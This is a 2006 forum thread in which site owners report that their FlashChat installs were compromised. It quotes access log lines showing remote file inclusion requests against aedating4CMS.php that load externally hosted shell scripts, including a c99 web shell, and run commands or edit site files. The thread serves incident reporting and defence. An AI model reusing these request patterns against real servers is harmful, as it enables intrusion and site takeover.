Vulnerability

dgaddy · #1 08-30-2006, 07:38 AM

There is a vulnerability in the aedating4CMS.php file - our site was hacked from it. I have the log if that would help.

arealy · #2 08-30-2006, 07:55 AM

ous site have been hacked 2.

Quote:

85.100.226.89 - - [30/Aug/2006:16:25:17 +0400] "GET /chat/inc/cmses/aedating4CMS.php?dir[inc]=http://dengesiz-team.org/haluk.txt?&cmd=id HTTP/1.1" 200 7304 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"

flamewalker · #3 08-30-2006, 10:33 AM

I too was hacked through this file. I will be discontinuing use of FlashChat. It was good while it lasted... you get what you pay for I guess.

flamewalker · #4 08-30-2006, 10:35 AM

From my host:

Quote:

So far, this is what I have found. I will be removing the following files from your account, as they were used to hack your account. You will need to check with the vendor for any updates.

-------- chat.gamingempires.com
-------- /home/gaming/public_html/chat/inc/cmses/aedating4CMS.php
-------- b2e4ece44b033d68346ab71e1e3f6df7 (ignore this, for my purposes only)
-------- looks like something called "FlashChat", likely developed by someone who just learned PHP yesterday. I strongly urge you to discontinue
all use of this script due to extremely poor code quality, or else you can probably expect to get hacked again. I would also contact the vendor and let them know you were hacked because of their poor quality code.

88.229.179.107 - - [30/Aug/2006:09:09:53 -0400] "POST /inc/cmses/aedating4CMS.php?action=logout&dir%5Binc%5D=http%3 A%2F%2Fusuarios.lycos.es%2Fthesh
redder%2Fc99.txt%3F&act=f&f=index.php&ft=edit&d=%2 Fhome%2Fgaming%2Fpublic_html%2F HTTP/1.1" 200 3378 "http://chat.gamingempires.com/inc/cmses/aedat
ing4CMS.php?action=logout&dir%5Binc%5D=http%3A%2F% 2Fusuarios.lycos.es%2Ftheshredder%2Fc99.txt%3F&act =f&f=index.php&ft=edit&d=%2Fhome%2Fgaming%2Fpub
lic_html%2F" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"

88.229.179.107 - - [30/Aug/2006:09:11:31 -0400] "POST /inc/cmses/aedating4CMS.php?action=logout&dir%5Binc%5D=http%3 A%2F%2Fusuarios.lycos.es%2Fthesh
redder%2Fc99.txt%3F&act=f&f=index.php&ft=edit&d=%2 Fhome%2Fgaming%2Fpublic_html%2Fchat%2F HTTP/1.1" 200 3394 "http://chat.gamingempires.com/inc/cmse
s/aedating4CMS.php?action=logout&dir%5Binc%5D=http%3 A%2F%2Fusuarios.lycos.es%2Ftheshredder%2Fc99.txt%3 F&act=f&f=index.php&ft=edit&d=%2Fhome%2Fgamin
g%2Fpublic_html%2Fchat%2F" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"

-------- chat.gamingempires.com
-------- /home/gaming/public_html/chat/getxml.php
-------- 2131a86ecb0fad6cc91bed8b412a248c (ignore this, for my purposes only)
-------- also something part of FlashChat. This is the 2nd file found from FlashChat to contain vulnerabilities. Again, I strongly urge you to remove everything associated with this FlashChat from your account, or you will likely get hacked again. If you decide to continue using this application, it will be banned from the server and we will remove all associated files accordingly. This application is essentially nothing but a backdoor.

88.229.179.107 - - [30/Aug/2006:09:08:33 -0400] "POST /getxml.php HTTP/1.1" 200 129 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"

24.90.115.81 - - [30/Aug/2006:10:47:35 -0400] "POST /getxml.php HTTP/1.1" 200 130 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"

(about 30 more of these from the same IP address)

24.90.115.81 - - [30/Aug/2006:10:49:58 -0400] "POST /getxml.php HTTP/1.1" 200 76 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6"

klj2000 · #5 08-30-2006, 01:54 PM

When something like this happens I wouldn't bother posting all this here. I would send the log file to Darren directly. Tell him what version of everything your using like if in this case if it's aeDating and which cms file you selected and the flashchat version. He will then make this a priority to fix this. You should send him a private message to g8z on this forum and have him take a look.

elmstr · #6 08-30-2006, 04:08 PM

My board was hacked through FlashChat too. Log files are available.
Unfortunately it looks like FlashChat must be uninstalled.

Geno · #7 08-30-2006, 04:45 PM

It's interesting how one person states that FlashChat caused a security hole and they got hacked, then several New Users with only -1- post jump in.

1. You must be using the newest version 4.6.1 .

2. If you truely have been hacked and feel flashchat or a CMS file is at fault, and you have log info. PLease PM the info to g8z so he can fix it.

I'll agree that when hackers find a hole in a program like Aedatiing, all they need to do is search for aedating installs that have the same setup. If it's the aedating CMS file for flashchat, then Darren can fix it with the proper information.

Thanks!

elmstr · #8 08-30-2006, 05:06 PM

I have sent pm to Darren.

PS. Sorry for posting. Just thought this is a message board.

How do you think should someone get a first post ?

Quote:

Originally Posted by Geno

It's interesting how one person states that FlashChat caused a security hole and they got hacked, then several New Users with only -1- post jump in.

Geno · #9 08-31-2006, 09:00 AM

Quote:

Originally Posted by elmstr

I have sent pm to Darren.

PS. Sorry for posting. Just thought this is a message board.

How do you think should someone get a first post ?

I wasn't necessarily pointing a finger at you personally. I just found it interesting.

halloway · #10 08-31-2006, 12:58 PM

Keep us updated on this one. I have had exactly the same experience.

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode